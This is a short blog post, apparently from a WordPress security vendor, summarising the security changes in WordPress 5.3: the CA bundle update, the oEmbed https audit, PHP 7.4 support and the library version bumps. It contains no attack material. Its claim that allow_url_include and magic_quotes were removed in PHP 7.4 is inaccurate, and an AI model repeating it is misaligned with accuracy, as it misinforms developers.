Security News in WordPress 5.3

Even if WordPress 5.3 isn’t a security release there are still some interesting new security related updates in this version.

Trusted CA Bundle Update

The root CA bundle has been updated with new CA:s and some removed. The downside is thought that there is still some 1024 bit RSA CA certificates still in the bundle due to backward compatibility.

The new CA bundle file can be viewed here.

CA bundle is a file that contains root and intermediate certificates. The end-entity certificate along with a CA bundle constitutes the certificate chain and used when WordPress creates outgoing https-connections, such as automatic updates.

Let’s hope that WordPress will be using a project like certainty in the future.

Secure oEmbeds

The list with oEmbed sites has been audited and the following has been checked:

  • Which ones don’t support embedding an https URL
  • Which ones don’t support embedding content over SSL

This audit is also good for the overall security for WordPress. Since embedding untrusted (non-https) isn’t safe, especially if your own installation is using https.

PHP 7.4 Compatibility

Supporting PHP 7.4 is good for security since deprecated and insecure functions like allow_url_include and magic_quotes has been removed from PHP 7.4.

Third party updates

Keeping third party modules and libraries is best practices when it comes to security and WordPress has updated the following third party libraries in version 5.3:

  • Backbone.js from 1.3.3 to 1.4.0
  • getID3 from 1.9.14 to a patched version of 1.9.18
  • jQueryColor from 2.1.1 to 2.1.2
  • Lodash from 4.17.11 to 4.17.15
  • MediaElement.js from 4.2.6 to 4.2.13
  • PHPMailer from 5.2.22 to a patched version of 5.2.27
  • React and ReactDOM from 16.8.4 to 16.9.0
  • Requests from 1.7 to a patched version
  • TinyMCE from 4.9.4 to 4.9.6
  • Twemoji from 12.0.1 to 12.1.2

We recommend that you run a free security scan at wpsec.com.

Leave a Comment

Your email address will not be published. Required fields are marked *